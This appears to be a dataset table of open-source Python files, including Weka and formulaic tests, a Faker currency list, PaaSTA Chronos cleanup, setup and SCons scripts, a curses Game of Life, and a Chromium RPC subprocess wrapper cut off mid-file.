| repo_name (string, length 5-100) | path (string, length 4-231) | language (string, 1 class) | license (string, 15 classes) | size (int64, 6-947k) | score (float64, 0-0.34) | prefix (string, length 0-8.16k) | middle (string, length 3-512) | suffix (string, length 0-8.17k) |
|---|---|---|---|---|---|---|---|---|
| nvoron23/python-weka-wrapper | tests/wekatests/plottests/experiments.py | Python | gpl-3.0 | 2,900 | 0.002759 |
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# experiments.py
# Copyright (C) 2015 Fracpete (pythonwekawrapper at gmail dot com)
import unittest
import weka.core.jvm as jvm
import weka.core.converters as converters
import weka.classifiers as classifiers
import weka.experiments as experiments
import weka.plot.experiments as plot
import wekatests.tests.weka_test as weka_test
class TestExperiments(weka_test.WekaTest):
def test_plot_experiment(self):
"""
Tests the plot_experiment method.
"""
datasets = [self.datafile("bolts.arff"), self.datafile("bodyfat.arff"), self.datafile("autoPrice.arff")]
cls = [
classifiers.Classifier("weka.classifiers.trees.REPTree"),
classifiers.Classifier("weka.classifiers.functions.LinearRegression"),
classifiers.Classifier("weka.classifiers.functions.SMOreg"),
]
outfile = self.tempfile("results-rs.arff")
exp = experiments.SimpleRandomSplitExperiment(
classification=False,
runs=10,
percentage=66.6,
preserve_order=False,
datasets=datasets,
classifiers=cls,
result=outfile)
exp.setup()
exp.run()
# evaluate
loader = converters.loader_for_file(outfile)
data = loader.load_file(outfile)
matrix = experiments.ResultMatrix("weka.experiment.ResultMatrixPlainText")
tester = experiments.Tester("weka.experiment.PairedCorrectedTTester")
tester.resultmatrix = matrix
comparison_col = data.attribute_by_name("Correlation_coefficient").index
tester.instances = data
tester.header(comparison_col)
tester.multi_resultset_full(0, comparison_col)
# plot
plot.plot_experiment(matrix, title="Random split (w/ StdDev)", measure="Correlation coefficient", show_stdev=True, wait=False)
plot.plot_experiment(matrix, title="Random split", measure="Correlation coefficient", wait=False)
def suite():
"""
Returns the test suite.
:return: the test suite
:rtype: unittest.TestSuite
"""
return unittest.TestLoader().loadTestsFromTestCase(TestExperiments)
if __name__ == '__main__':
jvm.start()
unittest.TextTestRunner().run(suite())
jvm.stop()
| joke2k/faker | faker/providers/currency/es_ES/__init__.py | Python | mit | 6,293 | 0.000161 |
from .. import Provider as CurrencyProvider
class Provider(CurrencyProvider):
# Format: (code, name)
currencies = (
("AED", "Dírham de los Emiratos Árabes Unidos"),
("AFN", "Afghaní"),
("ALL", "Lek albanés"),
("AMD", "Dram armenio"),
("ANG", "Florín de las Antillas Holandesas"),
("AOA", "Kwanza angoleño"),
("ARS", "Peso argentino"),
("AUD", "Dólar australiano"),
("AWG", "Florín arubeño"),
("AZN", "Manat azerbaiyano"),
("BAM", "Marco bosnioherzegovino"),
("BBD", "Dólar barbadense"),
("BDT", "Taka bangladesí"),
("BGN", "Lev búlgaro"),
("BHD", "Dinar bahreiní"),
("BIF", "Franco burundés"),
("BMD", "Dólar de Bermudas"),
("BND", "Dólar bruneano"),
("BOB", "Boliviano"),
("BRL", "Real brasileño"),
("BSD", "Dólar bahameño"),
("BTN", "Ngultrum butanés"),
("BWP", "Pula de Botswana"),
("BYR", "Rublio bielurruso"),
("BZD", "Dólar beliceño"),
("CAD", "Dólar canadiense"),
("CDF", "Franco congolés"),
("CHF", "Franco suizo"),
("CLP", "Peso chileno"),
("CNY", "Yuan"),
("COP", "Peso colombiano"),
("CRC", "Colón costarricense"),
("CUC", "Peso cubano convertible"),
("CUP", "Peso subano"),
("CVE", "Escudo de Cabo Verde"),
("CZK", "Corona checa"),
("DJF", "Franco yibutiano"),
("DKK", "Corona danesa"),
("DOP", "Peso dominicano"),
("DZD", "Dinar argelino"),
("EGP", "Libra egipcia"),
("ERN", "Nafka"),
("ETB", "Bir de Etiopía"),
("EUR", "Euro"),
("FJD", "Dólar fiyiano"),
("FKP", "Libra de las islas Falkland"),
("GBP", "Libra esterlina"),
("GEL", "Larí georgiano"),
("GGP", "Libra de Guernsey"),
("GHS", "Cedi"),
("GIP", "Libra de Gibraltar"),
("GMD", "Dalasi"),
("GNF", "Franco guineano"),
("GTQ", "Quetzal guatemalteco"),
("GYD", "Dólar guyanés"),
("HKD", "Dólar hongkonés"),
("HNL", "Lempira hondureño"),
("HRK", "Kuna croata"),
("HTG", "Gourde haitiano"),
("HUF", "Forinto húngaro"),
("IDR", "Rupia indonesia"),
("ILS", "Séquel israelí"),
("NIS", "Nuevo Séquel israelí"),
("IMP", "Libra manesa"),
("INR", "Rupia india"),
("IQD", "Dinar iraquí"),
("IRR", "Rial iraní"),
("ISK", "Corona islandesa"),
("JEP", "Libra de Jersey"),
("JMD", "Dólar jamaicano"),
("JOD", "Dinar jordano"),
("JPY", "Yen japonés"),
("KES", "Chelín keniano"),
("KGS", "Som kirguís"),
("KHR", "Riel camboyano"),
("KMF", "Franco comorense"),
("KPW", "Won norcoreano"),
("KRW", "Krahn Occidental"),
("KWD", "Dinar kuwaití"),
("KYD", "Dólar de las islas Cayman"),
("KZT", "Tenge kazako"),
("LAK", "Kip laosiano"),
("LBP", "Libra libanesa"),
("LKR", "Rupia esrilanquesa"),
("LRD", "Dólar liberiano"),
("LSL", "Loti lesothense"),
("LTL", "Litas lituana"),
("LYD", "Dinar libio"),
("MAD", "Dirham marroquí"),
("MDL", "Leu moldavo"),
("MGA", "Ariary malgache"),
("MKD", "Denar normacedonio"),
("MMK", "Kyat birmano"),
("MNT", "Tugrik mongol"),
("MOP", "Pataca macaense"),
("MRO", "Ouguiya mauritano"),
("MUR", "Rupia mauritana"),
("MVR", "Rupia de Maldivas"),
("MWK", "Kwacha malauí"),
("MXN", "Peso mexicano"),
("MYR", "Ringgit"),
("MZN", "Metical mozambiqueño"),
("NAD", "Dólar namibio"),
("NGN", "Naira nigeriano"),
("NIO", "Córdoba nicaragüense"),
("NOK", "Corona noruega"),
("NPR", "Rupia nepalí"),
("NZD", "Dólar neozelandés"),
("OMR", "Rial omaní"),
("PAB", "Balboa panameño"),
("PEN", "Sol peruano"),
("PGK", "Kina"),
("PHP", "Peso filipino"),
("PKR", "Rupia pakistaní"),
("PLN", "Złoty polaco"),
("PYG", "Guaraní paraguayo"),
("QAR", "Riyal catarí"),
("RON", "Leu rumano"),
("RSD", "Dinar serbio"),
("RUB", "Rublo ruso"),
("RWF", "Franco ruandés"),
("SAR", "Riyal saudí"),
("SBD", "Dólar de las islas Solomon"),
("SCR", "Rupia seychellense"),
("SDG", "Libra sudanesa"),
("SEK", "Corona sueca"),
("SGD", "Dólar de Singapur"),
("SHP", "Libra de Santa Elena"),
("SLL", "Leona"),
("SOS", "Chelín somalí"),
("SPL", "Luigino"),
("SRD", "Dólar surinamés"),
("STD", "Dobra santotomense"),
("SVC", "Colón salvadoreño"),
("SYP", "Libra siria"),
("SZL", "Lilangeni"),
("THB", "Baht tailandés"),
("TJS", "Somoni tayiko"),
("TMT", "Manat turcomano"),
("TND", "Dinar tunecino"),
("TOP", "Pa'anga tongano"),
("TRY", "Lira turca"),
("TTD", "Dólar de Trinidad and Tobago"),
("TVD", "Dólar tuvaluano"),
("TWD", "Nuevo dólar taiwanés"),
("TZS", "Chelín tanzano"),
("UAH", "Grivna ucraniano"),
("UGX", "Chelín ugandés"),
("USD", "Dólar de Estados Unidos"),
("UYU", "Peso uruguayo"),
("UZS", "Soʻm Uzbekistani"),
("VEF", "Bolívar venezolano"),
("VND", "Đồng vietnamita"),
("VUV", "Vanuatu vatu"),
("WST", "Tālā samoano"),
("XAF", "Franco centro africano"),
("XCD", "Dólar del Caribe Oriental"),
("XDR", "Derechos especiales de giro"),
("XOF", "Franco de África occidental"),
("XPF", "Franco CFP"),
("YER", "Rial yemení"),
("ZAR", "Rand sudafricano"),
("ZMW", "Kwacha zambiano"),
("ZWD", "Dólar zimbabuense"),
)
price_formats = ["#,##", "%#,##", "%##,##", "%.###,##", "%#.###,##"]
def pricetag(self) -> str:
return self.numerify(self.random_element(self.price_formats)) + "\N{no-break space}\N{euro sign}"
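# Illustrative usage sketch (not part of the provider above; the method names
# come from upstream Faker and are stated here as an assumption): with the
# faker package installed, the "es_ES" locale selects this CurrencyProvider,
# and the base class builds currency()/pricetag() from the tuples and
# price_formats defined in this file.
from faker import Faker

fake = Faker("es_ES")
print(fake.currency())   # e.g. ('EUR', 'Euro')
print(fake.pricetag())   # e.g. '1.234,56 €'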
| matthewwardrop/formulaic | tests/parser/types/test_term.py | Python | mit | 1,044 | 0 |
import pytest
from formulaic.parser.types import Factor, Term
class TestTerm:
@pytest.fixture
def term1(self):
return Term([Factor("c"), Factor("b")])
@pytest.fixture
def term2(self):
return Term([Factor("c"), Factor("d")])
@pytest.fixture
def term3(self):
return Term([Factor("a"), Factor("b"), Factor("c")])
def test_mul(self, term1, term2):
assert str(term1 * term2) == "b:c:d"
with pytest.raises(TypeError):
term1 * 1
def test_hash(self, term1):
assert hash(term1) == hash("b:c")
def test_equality(self, term1, term2):
assert term1 == term1
assert term1 == "b:c"
assert term1 != term2
assert term1 != 1
def test_sort(self, term1, term2, term3):
assert term1 < term2
assert term2 < term3
assert term1 < term3
assert not (term3 < term1)
with pytest.raises(TypeError):
term1 < 1
def test_repr(self, term1):
assert repr(term1) == "b:c"
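# Quick illustration (usage assumed from the tests above, not additional test
# code): multiplying two Terms unions their factors and renders them sorted.
from formulaic.parser.types import Factor, Term

t1 = Term([Factor("c"), Factor("b")])
t2 = Term([Factor("c"), Factor("d")])
print(t1 * t2)  # prints "b:c:d", matching test_mul above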
| somic/paasta | paasta_tools/cleanup_chronos_jobs.py | Python | apache-2.0 | 8,610 | 0.002323 |
#!/usr/bin/env python
# Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Usage: ./cleanup_chronos_jobs.py [options]
Clean up chronos jobs that aren't supposed to run on this cluster by deleting them.
Gets the current job list from chronos, and then a 'valid_job_list'
via chronos_tools.get_chronos_jobs_for_cluster
If a job is deployed by chronos but not in the expected list, it is deleted.
Any tasks associated with that job are also deleted.
- -d <SOA_DIR>, --soa-dir <SOA_DIR>: Specify a SOA config dir to read from
"""
import argparse
import datetime
import sys
import dateutil.parser
import pysensu_yelp
from paasta_tools import chronos_tools
from paasta_tools import monitoring_tools
from paasta_tools import utils
from paasta_tools.check_chronos_jobs import check_chronos_job_name
from paasta_tools.utils import InvalidJobNameError
from paasta_tools.utils import NoConfigurationForServiceError
from paasta_tools.utils import paasta_print
def parse_args():
parser = argparse.ArgumentParser(description='Cleans up stale chronos jobs.')
parser.add_argument(
'-d', '--soa-dir', dest="soa_dir", metavar="SOA_DIR",
default=chronos_tools.DEFAULT_SOA_DIR,
help="define a different soa config directory",
)
args = parser.parse_args()
return args
def execute_chronos_api_call_for_job(api_call, job):
"""Attempt a call to the Chronos api, catching any exception.
We *have* to catch Exception, because the client catches
the more specific exception thrown by the http clients
and rethrows an Exception -_-.
The chronos api returns a 204 No Content when the delete is
successful, and chronos-python only returns the body of the
response from all http calls. So, if this is successful,
then None will be returned.
https://github.com/asher/chronos-python/pull/7
We catch it here, so that the other deletes are completed.
"""
try:
return api_call(job)
except Exception as e:
return e
def cleanup_jobs(client, jobs):
"""Maps a list of jobs to cleanup to a list of response objects (or exception objects) from the api"""
return [(job, execute_chronos_api_call_for_job(client.delete, job)) for job in jobs]
def cleanup_tasks(client, jobs):
"""Maps a list of tasks to cleanup to a list of response objects (or exception objects) from the api"""
return [(job, execute_chronos_api_call_for_job(client.delete_tasks, job)) for job in jobs]
def format_list_output(title, job_names):
return '%s\n %s' % (title, '\n '.join(job_names))
def deployed_job_names(client):
return [job['name'] for job in client.list()]
def filter_paasta_jobs(jobs):
"""
Given a list of job name strings, return only those in the format PaaSTA expects.
:param jobs: a list of job names.
:returns: those job names in a format PaaSTA expects
"""
formatted = []
for job in jobs:
try:
# attempt to decompose it
service, instance = chronos_tools.decompose_job_id(job)
formatted.append(job)
except InvalidJobNameError:
pass
return formatted
def filter_tmp_jobs(job_names):
"""
filter temporary jobs created by chronos_rerun
"""
return [name for name in job_names if name.startswith(chronos_tools.TMP_JOB_IDENTIFIER)]
def filter_expired_tmp_jobs(client, job_names, cluster, soa_dir):
"""
Given a list of temporary jobs, find those ready to be removed. Their
suitability for removal is defined by two things:
- the job has completed (irrespective of whether it was a success or
failure)
- the job completed more than 24 hours ago
"""
expired = []
for job_name in job_names:
service, instance = chronos_tools.decompose_job_id(job_name)
temporary_jobs = chronos_tools.get_temporary_jobs_for_service_instance(
client=client,
service=service,
instance=instance,
)
for job in temporary_jobs:
last_run_time, last_run_state = chronos_tools.get_status_last_run(job)
try:
chronos_job_config = chronos_tools.load_chronos_job_config(
service=service,
instance=instance,
cluster=cluster,
soa_dir=soa_dir,
)
interval = chronos_job_config.get_schedule_interval_in_seconds() or 0
except NoConfigurationForServiceError:
# If we can't get the job's config, default to cleanup after 1 day
interval = 0
if last_run_state != chronos_tools.LastRunState.NotRun:
if ((datetime.datetime.now(dateutil.tz.tzutc()) -
dateutil.parser.parse(last_run_time)) >
max(datetime.timedelta(seconds=interval), datetime.timedelta(days=1))):
expired.append(job_name)
return expired
def main():
args = parse_args()
soa_dir = args.soa_dir
config = chronos_tools.load_chronos_config()
client = chronos_tools.get_chronos_client(config)
system_paasta_config = utils.load_system_paasta_config()
cluster = system_paasta_config.get_cluster()
running_jobs = set(deployed_job_names(client))
expected_service_jobs = {chronos_tools.compose_job_id(*job) for job in
chronos_tools.get_chronos_jobs_for_cluster(soa_dir=args.soa_dir)}
all_tmp_jobs = set(filter_tmp_jobs(filter_paasta_jobs(running_jobs)))
expired_tmp_jobs = set(filter_expired_tmp_jobs(client, all_tmp_jobs, cluster=cluster, soa_dir=soa_dir))
valid_tmp_jobs = all_tmp_jobs - expired_tmp_jobs
to_delete = running_jobs - expected_service_jobs - valid_tmp_jobs
task_responses = cleanup_tasks(client, to_delete)
task_successes = []
task_failures = []
for response in task_responses:
if isinstance(response[-1], Exception):
task_failures.append(response)
else:
task_successes.append(response)
job_responses = cleanup_jobs(client, to_delete)
job_successes = []
job_failures = []
for response in job_responses:
if isinstance(response[-1], Exception):
job_failures.append(response)
else:
job_successes.append(response)
try:
(service, instance) = chronos_tools.decompose_job_id(response[0])
monitoring_tools.send_event(
check_name=check_chronos_job_name(service, instance),
service=service,
overrides={},
soa_dir=soa_dir,
status=pysensu_yelp.Status.OK,
output="This instance was removed and is no longer supposed to be scheduled.",
)
except InvalidJobNameError:
# If we deleted some bogus job with a bogus jobid that could not be parsed,
# Just move on, no need to send any kind of paasta event.
pass
if len(to_delete) == 0:
paasta_print('No Chronos Jobs to remove')
else:
if len(task_successes) > 0:
paasta_print(format_list_output(
"Successfully Removed Tasks (if any were running) for:",
[job[0] for job in task_successes],
))
# if there are any failures, print and exit appropriately
if len(task_failures) > 0:
paasta_print(format_list_output("Failed to Delete Tasks for:", [job[0] for job in task_failures]))
if len(job_successes) > 0:
| getefesto/efesto | setup.py | Python | gpl-3.0 | 1,723 | 0 |
#!/usr/bin/env python
import io
import os
import sys
from efesto.Version import version
from setuptools import find_packages, setup
if sys.argv[-1] == 'publish':
os.system('python setup.py sdist upload')
os.system('python setup.py bdist_wheel upload')
sys.exit()
readme = io.open('README.md', 'r', encoding='utf-8').read()
setup(
name='efesto',
description='RESTful (micro)server that can generate an API in minutes.',
long_description=readme,
long_description_content_type='text/markdown',
url='https://github.com/getefesto/efesto',
author='Jacopo Cascioli',
author_email='noreply@jacopocascioli.com',
license='GPL3',
version=version,
packages=find_packages(),
tests_require=[
'pytest',
'pytest-mock',
'pytest-falcon'
],
setup_requires=['pytest-runner'],
install_requires=[
'falcon>=1.4.1',
'falcon-cors>=1.1.7',
'psycopg2-binary>=2.7.5',
'peewee>=3.7.1',
'click==6.7',
'colorama>=0.4.0',
'aratrum>=0.3.2',
'python-rapidjson>=0.6.3',
'pyjwt>=1.6.4',
'ruamel.yaml>=0.15.74'
],
classifiers=[
'Intended Audience :: Developers',
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
],
entry_points="""
[console_scripts]
efesto=efesto.Cli:Cli.main
"""
)
| michalliu/OpenWrt-Firefly-Libraries | staging_dir/host/lib/scons-2.3.1/SCons/Tool/sunf90.py | Python | gpl-2.0 | 2,198 | 0.003185 |
"""SCons.Tool.sunf90
Tool-specific initialization for sunf90, the Sun Studio F90 compiler.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/sunf90.py 2014/03/02 14:18:15 garyo"
import SCons.Util
from FortranCommon import add_all_to_env
compilers = ['sunf90', 'f90']
def generate(env):
"""Add Builders and construction variables for sun f90 compiler to an
Environment."""
add_all_to_env(env)
fcomp = env.Detect(compilers) or 'f90'
env['FORTRAN'] = fcomp
env['F90'] = fcomp
env['SHFORTRAN'] = '$FORTRAN'
env['SHF90'] = '$F90'
env['SHFORTRANFLAGS'] = SCons.Util.CLVar('$FORTRANFLAGS -KPIC')
env['SHF90FLAGS'] = SCons.Util.CLVar('$F90FLAGS -KPIC')
def exists(env):
return env.Detect(compilers)
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
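# Minimal sketch of how a tool module like this is normally consumed
# (illustrative; the SConstruct content below is an assumption, not part of
# this file). SCons.Tool.Tool() calls exists()/generate() when the tool name
# appears in an Environment's tools list:
from SCons.Script import Environment

env = Environment(tools=['default', 'sunf90'])
env.Program('hello', 'hello.f90')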
| JnyJny/GameOfLife | contrib/NCGameOfLife.py | Python | mit | 5,897 | 0.010853 |
#!/usr/bin/env python3
'''Conway's Game of Life in a Curses Terminal Window
'''
import curses
import time
from GameOfLife import NumpyWorld
from GameOfLife import Patterns
from curses import ( COLOR_BLACK, COLOR_BLUE, COLOR_CYAN,
COLOR_GREEN, COLOR_MAGENTA, COLOR_RED,
COLOR_WHITE, COLOR_YELLOW )
class CursesWorld(NumpyWorld):
'''
Display a Game of Life in a terminal window using curses.
'''
colors = [COLOR_WHITE,COLOR_YELLOW,COLOR_MAGENTA,
COLOR_CYAN,COLOR_RED,COLOR_GREEN,COLOR_BLUE]
def __init__(self,window):
'''
:param: window - curses window
'''
h,w = window.getmaxyx()
super(CursesWorld,self).__init__(w,h-1)
self.w = window
self.interval = 0
for n,fg in enumerate(self.colors):
curses.init_pair(n+1,fg,COLOR_BLACK)
@property
def gps(self):
'''
Generations per second.
'''
try:
return self._gps
except AttributeError:
pass
self._gps = 0
return self._gps
@gps.setter
def gps(self,newValue):
self._gps = int(newValue)
def colorForCell(self,age):
'''
Returns a curses color_pair for a cell, chosen by the cell's age.
'''
n = min(age // 100,len(self.colors)-1)
return curses.color_pair(n+1)
def handle_input(self):
'''
Accepts input from the user and acts on it.
Key Action
-----------------
q exit()
Q exit()
+ increase redraw interval by 10 milliseconds
- decrease redraw interval by 10 milliseconds
'''
c = self.w.getch()
if c == ord('q') or c == ord('Q'):
exit()
if c == ord('+'):
self.interval += 10
if c == ord('-'):
self.interval -= 10
if self.interval < 0:
self.interval = 0
@property
def status(self):
'''
Format string for the status line.
'''
try:
return self._status.format(self=self,
a=len(self.alive),
t=self.cells.size)
except AttributeError:
pass
s = ['Q to quit\t',
'{self.generation:>10} G',
'{self.gps:>4} G/s',
'Census: {a:>5}/{t:<5}',
'{self.interval:>4} ms +/-']
self._status = ' '.join(s)
return self._status.format(self=self,
a=len(self.alive),
t=self.cells.size)
def draw(self):
'''
:return: None
Updates each character in the curses window with
the appropriate colored marker for each cell in the world.
Moves the cursor to bottom-most line, left-most column
when finished.
'''
for y in range(self.height):
for x in range(self.width):
c = self[x,y]
self.w.addch(y,x,self.markers[c > 0],self.colorForCell(c))
self.w.addstr(self.height,2,self.status)
self.w.move(self.height,1)
def run(self,stop=-1,interval=0):
'''
:param: stop - optional integer
:param: interval - optional integer
:return: None
This method will run the simulation described by world until the
given number of generations specified by ''stop'' has been met.
The default value will cause the simulation to run until interrupted
by the user.
The interval is number of milliseconds to pause between generations.
The default value of zero allows the simulation to run as fast as
possible.
The simulation is displayed via curses in a terminal window and
displays a status line at the bottom of the window.
The simulation can be stopped by the user pressing the keys 'q' or
'Q'. The interval between simulation steps can be increased with
the plus key '+' or decreased with the minus key '-' by increments
of 10 milliseconds.
'''
self.w.clear()
self.interval = interval
try:
while True:
if self.generation == stop:
break
self.handle_input()
t0 = time.time()
self.step()
self.draw()
self.w.refresh()
if self.interval:
curses.napms(self.interval)
t1 = time.time()
self.gps = 1/(t1-t0)
except KeyboardInterrupt:
pass
def main(stdscr,argv):
w = CursesWorld(stdscr)
if len(argv) == 1:
raise ValueError("no patterns specified.")
for thing in argv[1:]:
name,_,where = thing.partition(',')
try:
x,y = map(int,where.split(','))
except:
x,y = 0,0
w.addPattern(Patterns[name],x=x,y=y)
stdscr.nodelay(True)
w.run()
def usage(argv,msg=None,exit_value=-1):
usagefmt = 'usage: {name} [[pattern_name],[X,Y]] ...'
namefmt = '\t{n}'
print(usagefmt.format(name=os.path.basename(argv[0])))
if msg:
print(msg)
print('pattern names:')
[print(namefmt.format(n=name)) for name in Patterns.keys()]
exit(exit_value)
if __name__ == '__main__':
import sys
import os
from curses import wrapper
try:
wrapper(main,sys.argv)
except KeyError as e:
usage(sys.argv,'unknown pattern {p}'.format(p=str(e)))
except ValueError as e:
usage(sys.argv,str(e))
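# Hypothetical invocation (pattern names depend on GameOfLife.Patterns and are
# assumptions here). main() splits each argument as "pattern_name,X,Y", so a
# run might look like:
#   python3 NCGameOfLife.py glider,10,10 block,0,0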
| Teamxrtc/webrtc-streaming-node | third_party/webrtc/src/chromium/src/testing/legion/process.py | Python | mit | 8,760 | 0.010046 |
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""RPC compatible subprocess-type module.
This module defines both a task-side process class as well as a controller-side
process wrapper for easier access and usage of the task-side process.
"""
import logging
import os
import subprocess
import sys
import threading
import time
#pylint: disable=relative-import
import common_lib
# Map swarming_client to use subprocess42
sys.path.append(common_lib.SWARMING_DIR)
from utils import subprocess42
class TimeoutError(Exception):
pass
class ControllerProcessWrapper(object):
"""Controller-side process wrapper class.
This class provides a more intuitive interface to task-side processes
than calling the methods directly using the RPC object.
"""
def __init__(self, rpc, cmd, verbose=False, detached=False, cwd=None,
key=None, shell=None):
logging.debug('Creating a process with cmd=%s', cmd)
self._rpc = rpc
self._key = rpc.subprocess.Process(cmd, key)
logging.debug('Process created with key=%s', self._key)
if verbose:
self._rpc.subprocess.SetVerbose(self._key)
if detached:
self._rpc.subprocess.SetDetached(self._key)
if cwd:
self._rpc.subprocess.SetCwd(self._key, cwd)
if shell:
self._rpc.subprocess.SetShell(self._key)
self._rpc.subprocess.Start(self._key)
@property
def key(self):
return self._key
def Terminate(self):
logging.debug('Terminating process %s', self._key)
return self._rpc.subprocess.Terminate(self._key)
def Kill(self):
logging.debug('Killing process %s', self._key)
self._rpc.subprocess.Kill(self._key)
def Delete(self):
return self._rpc.subprocess.Delete(self._key)
def GetReturncode(self):
return self._rpc.subprocess.GetReturncode(self._key)
def ReadStdout(self):
"""Returns all stdout since the last call to ReadStdout.
This call allows the user to read stdout while the process is running.
However each call will flush the local stdout buffer. In order to make
multiple calls to ReadStdout and to retain the entire output the results
of this call will need to be buffered in the calling code.
"""
return self._rpc.subprocess.ReadStdout(self._key)
def ReadStderr(self):
"""Returns all stderr read since the last call to ReadStderr.
See ReadStdout for additional details.
"""
return self._rpc.subprocess.ReadStderr(self._key)
def ReadOutput(self):
"""Returns the (stdout, stderr) since the last Read* call.
See ReadStdout for additional details.
"""
return self._rpc.subprocess.ReadOutput(self._key)
def Wait(self, timeout=None):
return self._rpc.subprocess.Wait(self._key, timeout)
def Poll(self):
return self._rpc.subprocess.Poll(self._key)
def GetPid(self):
return self._rpc.subprocess.GetPid(self._key)
class Process(object):
"""Implements a task-side non-blocking subprocess.
This non-blocking subprocess allows the caller to continue operating while
also able to interact with this subprocess based on a key returned to
the caller at the time of creation.
Creation args are set via Set* methods called after calling Process but
before calling Start. This is due to a limitation of the XML-RPC
implementation not supporting keyword arguments.
"""
_processes = {}
_process_next_id = 0
_creation_lock = threading.Lock()
def __init__(self, cmd, key):
self.stdout = ''
self.stderr = ''
self.key = key
self.cmd = cmd
self.proc = None
self.cwd = None
self.shell = False
self.verbose = False
self.detached = False
self.complete = False
self.data_lock = threading.Lock()
self.stdout_file = open(self._CreateOutputFilename('stdout'), 'wb+')
self.stderr_file = open(self._CreateOutputFilename('stderr'), 'wb+')
def _CreateOutputFilename(self, fname):
return os.path.join(common_lib.GetOutputDir(), '%s.%s' % (self.key, fname))
def __str__(self):
return '%r, cwd=%r, verbose=%r, detached=%r' % (
self.cmd, self.cwd, self.verbose, self.detached)
def _reader(self):
for pipe, data in self.proc.yield_any():
with self.data_lock:
if pipe == 'stdout':
self.stdout += data
self.stdout_file.write(data)
self.stdout_file.flush()
if self.verbose:
sys.stdout.write(data)
else:
self.stderr += data
self.stderr_file.write(data)
self.stderr_file.flush()
if self.verbose:
sys.stderr.write(data)
self.complete = True
@classmethod
def KillAll(cls):
for key in cls._processes:
cls.Kill(key)
@classmethod
def Process(cls, cmd, key=None):
with cls._creation_lock:
if not key:
key = 'Process%d' % cls._process_next_id
cls._process_next_id += 1
if key in cls._processes:
raise KeyError('Key %s already in use' % key)
logging.debug('Creating process %s with cmd %r', key, cmd)
cls._processes[key] = cls(cmd, key)
return key
def _Start(self):
logging.info('Starting process %s', self)
self.proc = subprocess42.Popen(self.cmd, stdout=subprocess42.PIPE,
stderr=subprocess42.PIPE,
detached=self.detached, cwd=self.cwd,
shell=self.shell)
threading.Thread(target=self._reader).start()
@classmethod
def Start(cls, key):
cls._processes[key]._Start()
@classmethod
def SetCwd(cls, key, cwd):
"""Sets the process's cwd."""
logging.debug('Setting %s cwd to %s', key, cwd)
cls._processes[key].cwd = cwd
@classmethod
def SetShell(cls, key):
"""Sets the process's shell arg to True."""
logging.debug('Setting %s.shell = True', key)
cls._processes[key].shell = True
@classmethod
def SetDetached(cls, key):
"""Creates a detached process."""
logging.debug('Setting %s.detached = True', key)
cls._processes[key].detached = True
@classmethod
def SetVerbose(cls, key):
"""Sets the stdout and stderr to be emitted locally."""
logging.debug('Setting %s.verbose = True', key)
cls._processes[key].verbose = True
@classmethod
def Terminate(cls, key):
logging.debug('Terminating process %s', key)
cls._processes[key].proc.terminate()
@classmethod
def Kill(cls, key):
logging.debug('Killing process %s', key)
cls._processes[key].proc.kill()
@classmethod
def Delete(cls, key):
if cls.GetReturncode(key) is None:
logging.warning('Killing %s before deleting it', key)
cls.Kill(key)
logging.debug('Deleting process %s', key)
cls._processes.pop(key)
@classmethod
def GetReturncode(cls, key):
return cls._processes[key].proc.returncode
@classmethod
def ReadStdout(cls, key):
"""Returns all stdout since the last call to ReadStdout.
This call allows the user to read stdout while the process is running.
However each call will flush the local stdout buffer. In order to make
multiple calls to ReadStdout and to retain the entire output the results
of this call will need to be buffered in the calling code.
"""
proc = cls._processes[key]
with proc.data_lock:
# Perform a "read" on the stdout data
stdout = proc.stdout
proc.stdout = ''
return stdout
@classmethod
def ReadStderr(cls, key):
"""Returns all stderr read since the last call to ReadStderr.
See ReadStdout for additional details.
"""
proc = cls._processes[key]
with proc.data_lock:
# Perform a "read" on the stderr data
stderr = proc.stderr
proc.stderr = ''
return stderr
@classmethod
def ReadOutput(cls, key):
"""Returns the (stdout, stderr) since the last Read* call.
See ReadStdout for additional details.
"""
return cls.ReadStdout(key), cls.ReadStderr(key)
@classmethod
